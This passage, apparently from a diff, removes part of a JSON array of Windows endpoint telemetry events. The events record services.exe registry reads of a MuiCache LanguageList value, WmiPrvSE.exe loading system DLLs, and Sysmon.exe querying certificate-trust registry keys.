"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": 
"C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - 
"event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "image_load", - "image_name": "shell32.dll", - "image_path": 
"C:\\Windows\\System32\\shell32.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", 
- "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - 
"event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "image_load", - "image_name": "dsparse.dll", - "image_path": "C:\\Windows\\System32\\dsparse.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - 
"registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847770000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847770000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847770000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847770000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "image_load", - 
"image_name": "tscfgwmi.dll", - "image_path": "C:\\Windows\\System32\\tscfgwmi.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570847770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - 
"timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570847930000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": 
